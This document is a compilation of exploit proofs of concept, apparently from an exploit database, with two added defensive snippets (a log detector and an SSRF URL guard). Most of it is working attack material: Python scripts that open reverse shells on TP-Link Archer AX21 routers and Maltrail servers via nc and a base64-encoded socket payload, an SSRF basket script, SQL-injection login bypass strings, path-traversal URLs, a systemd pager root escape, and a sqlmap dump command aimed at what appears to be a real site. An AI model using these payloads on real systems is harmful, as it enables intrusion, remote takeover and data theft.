<pre><code>====================================================================================================================================
| # Title : Easy2Pilot V7 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://www.progetis.lu/easy2pilot/ |
====================================================================================================================================

poc :

[+] Dorking In Google Or Other Search Engine.

[+] Use payload : user & Pass : 1' or 1=1 -- -

[+] http://127.0...1/easy2pilot-v7com/admin

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
</code></pre>
<pre><code>#!/usr/bin/python3
#
# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
# Date: 07/25/2023
# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)
# Vendor Homepage: https://www.tp-link.com/us/
# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)
# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0
# CVE: CVE-2023-1389
#
# Disclaimer: This script is intended to be used for educational purposes only.
# Do not run this against any system that you do not have permission to test.
# The author will not be held responsible for any use or damage caused by this
# program.
#
# CVE-2023-1389 is an unauthenticated command injection vulnerability in the web
# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the
# *country* parameter of the *write* callback for the *country* form at the
# "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is
# possible to run commands as root. Execution requires sending the request twice;
# the first request sets the command in the *country* value, and the second request
# (which can be identical or not) executes it.
#
# This script is a short proof of concept to obtain a reverse shell. To read more
# about the development of this script, you can read the blog post here:
# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
# Before running the script, start a nc listener on your preferred port -> run the script -> profit

import requests, urllib.parse, argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Suppress warning for connecting to a router with a self-signed certificate
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Take user input for the router IP, and attacker IP and port
parser = argparse.ArgumentParser()

parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")
parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")

args = parser.parse_args()

# Generate the reverse shell command with the attacker IP and port
revshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")

# URL to obtain the reverse shell
url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"

# Send the URL twice to run the command. Sending twice is necessary for the attack
r = requests.get(url_command, verify=False)
r = requests.get(url_command, verify=False)

</code></pre>
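Defender-side detection for the CVE-2023-1389 request pattern described in the header above, as an added example that is neither part of the original exploit nor vendor code. The log layout, client addresses and request lines are constructed for this example; it flags any write to the locale form whose decoded `country` value carries shell metacharacters, and separately lists clients that repeated the same write, which matches the two-request trigger the exploit relies on.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed access-log sample in a simplified "<client_ip> <method> <request_target>" layout;
# %24%28id%29 decodes to $(id), and the last two lines model the PoC's two identical requests.
SAMPLE_LOG = """\
192.168.0.23 GET /cgi-bin/luci/;stok=/locale?form=country&operation=read
203.0.113.9 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=US
203.0.113.9 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28id%29
198.51.100.4 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(nc%2010.0.0.1%209999)
198.51.100.4 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(nc%2010.0.0.1%209999)
"""

SHELL_META = re.compile(r"[$`;|&<>(){}\\]")     # never legitimate inside a country code
VALID_COUNTRY = re.compile(r"^[A-Za-z]{2,3}$")  # ISO 3166 alpha-2 / alpha-3 style value

def locale_write_country(target):
    """Decoded 'country' value if target is a write to the locale form, else None."""
    parts = urlsplit(target)              # ';stok=/locale' remains in the path component
    qs = parse_qs(parts.query)
    ok = parts.path.endswith("/locale") and qs.get("form") == ["country"] and qs.get("operation") == ["write"]
    return qs.get("country", [""])[0] if ok else None

def classify(target):
    """'exploit' (shell metacharacters), 'suspicious' (not a country code), 'write', or None."""
    country = locale_write_country(target)
    if country is None:
        return None
    if SHELL_META.search(country):
        return "exploit"
    return "write" if VALID_COUNTRY.match(country) else "suspicious"

def records(log_text):
    """Split the constructed log lines into (client_ip, request_target) pairs."""
    for line in log_text.splitlines():
        ip, _method, target = line.split(" ", 2)
        yield ip, target

def scan(log_text):
    """(client_ip, verdict, decoded country) for every exploit or suspicious locale write."""
    verdicts = ((ip, classify(t), locale_write_country(t)) for ip, t in records(log_text))
    return [v for v in verdicts if v[1] in ("exploit", "suspicious")]

def repeated_writes(log_text):
    """Clients that sent the same locale write more than once (the PoC's two-request trigger)."""
    seen = Counter((ip, t) for ip, t in records(log_text) if locale_write_country(t) is not None)
    return {ip for (ip, _t), n in seen.items() if n > 1}
```

On a real device the same check belongs in front of the form handler: reject the write unless the value matches VALID_COUNTRY, since a country code never needs shell interpretation.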
<pre><code># Exploit Title: systemd 246 - Local Privilege Escalation
# Exploit Author: Iyaad Luqman K (init_6)
# Application: systemd 246
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-26604

systemd 246 was discovered to contain a privilege escalation vulnerability when the `systemctl status` command can be run as the root user.
This vulnerability allows a local attacker to gain root privileges.

## Proof Of Concept:
1. Run the systemctl command which can be run as root user.

sudo /usr/bin/systemctl status any_service

2. The output is opened in a pager (less) which allows us to execute arbitrary commands.

3. Type in `!/bin/sh` in the pager to spawn a shell as root user.

</code></pre>
<pre><code># Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Maltrail v0.53
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-27163


# PoC
import sys
import os
import base64

def main():
    listening_IP = None
    listening_PORT = None
    target_URL = None

    if len(sys.argv) != 4:
        print("Error. Needs listening IP, PORT and target URL.")
        return -1

    listening_IP = sys.argv[1]
    listening_PORT = sys.argv[2]
    target_URL = sys.argv[3] + "/login"
    print("Running exploit on " + str(target_URL))
    curl_cmd(listening_IP, listening_PORT, target_URL)

def curl_cmd(my_ip, my_port, target_url):
    payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
    encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
    command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
    os.system(command)

if __name__ == "__main__":
    main()

</code></pre>
<pre><code># Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Request-Baskets v1.2.1
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-27163


# PoC
#!/bin/bash


if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
    help="Usage: exploit.sh <URL> <TARGET>\n\n";
    help+="Arguments:\n";
    help+="  URL     main path (/) of the server (eg. http://127.0.0.1:5000/)\n";
    help+="  TARGET";

    echo -e "$help";
    exit 1;
fi

URL=$1
ATTACKER_SERVER=$2

if [ "${URL: -1}" != "/" ]; then
    URL="$URL/";
fi;

BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");

API_URL="$URL""api/baskets/$BASKET_NAME";

PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";

echo "> Creating the \"$BASKET_NAME\" proxy basket...";

if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then
    echo "> FATAL: Could not properly request $API_URL. Is the server online?";
    exit 1;
fi;

BASKET_URL="$URL$BASKET_NAME";

echo "> Basket created!";
echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";

if ! jq --help 1>/dev/null; then
    echo "> Response body (Authorization): $response";
else
    echo "> Authorization: $(echo "$response" | jq -r ".token")";
fi;

exit 0;

</code></pre>
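A server-side guard for the `forward_url` setting that the basket PoC above abuses, as an added example written in Python for this page rather than taken from Request-Baskets (a Go project). `resolve_all`, `is_internal` and `check_forward_url` are names chosen here; the stub resolver used in the test, with its hostnames and addresses, is constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # policy chosen for this example: no file:, gopher:, etc.

def resolve_all(host):
    """Every address a hostname maps to; a guard must vet all of them, not just the first."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})

def is_internal(addr):
    """True for loopback, RFC 1918, link-local, CGNAT, multicast, reserved and unspecified addresses."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                # judge ::ffff:a.b.c.d by the embedded IPv4 address
    return (not ip.is_global) or ip.is_multicast

def check_forward_url(url, resolver=resolve_all):
    """Return (ok, reason) for a candidate forward_url; ok is False for any internal destination."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "userinfo in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP: nothing to look up
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if is_internal(addr):
            return False, f"{host} resolves to internal address {addr}"
    return True, "ok"
```

Resolve once and connect to the vetted address instead of re-resolving at request time; a hostname whose answer changes between the check and the request (DNS rebinding) otherwise bypasses the guard.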
<pre><code># Exploit Title: OutSystems Service Studio 11.53.30 - DLL Hijacking
# Date: 2023-08-09
# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
# Vendor Homepage: https://www.outsystems.com/
# Version: Up to 11.53.30 (Build 61739)
# Tested on: Windows
# CVE : CVE-2022-47636

A DLL hijacking vulnerability has been discovered in OutSystems Service
Studio 11 11.53.30 build 61739.
When a user opens a .oml file (OutSystems Modeling Language), the
application will load the following DLLs from the same directory:

av_libGLESv2.dll
libcef.DLL
user32.dll
d3d10warp.dll

Using a crafted DLL, it is possible to execute arbitrary code in the
context of the currently logged-in user.

</code></pre>
<pre><code>====================================================================================================================================
| # Title : i2soft CMS v2.0 Insecure Direct Object Reference Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://www.i2softbd.com/ |
====================================================================================================================================

poc :

[+] Dorking In Google Or Other Search Engine.

[+] suffers from an insecure direct object reference that allows users to access the administrative interface.

[+] use payload 1 : /Admin/menu.php

[+] use payload 2 : Admin/container.php?p=../footer.html

[+] now you can modify the footer page or read other files

[+] https://wtaazakhobor24com/Admin/container.php?p=../footer.html

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : helloGTX Travel Portal CRM v1.6 Insecure Direct Object Reference Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://www.hellogtx.com/ |
====================================================================================================================================

poc :

[+] Dorking In Google Or Other Search Engine.

[+] suffers from an insecure direct object reference that allows users to access the administrative interface.

[+] use payload : /admin/index/dashboard

[+] Watch only without editing

[+] https://wwholidaysbookerscom/admin/index/dashboard

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : FlatApp - Premium Admin Dashboard 1.0 SQL injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://themeforest.net/item/flatapp-premium-admin-dashboard-template/4961564?ref=pixelcave |
====================================================================================================================================

poc :

[+] Dorking In Google Or Other Search Engine.

[+] use payload : /business-detail.php?lid=15003 <===== inject here

[+] D:\sqlmap>sqlmap.py -u https://wwmrigindiacom/business-detail.php?lid=15003 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dump -D mrigindi_new1 -T admin_login

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : Greeva 2.0 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit) |
| # Vendor : https://coderthemes.com/greeva/index.html |
====================================================================================================================================

poc :

[+] Dorking In Google Or Other Search Engine.

[+] use payload : user & pass = 1'or'1'='1

[+] http://127.0.0.1/wsb-patho.com/sbpatho_system/pap_system/dist/auth-login.php

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
</code></pre>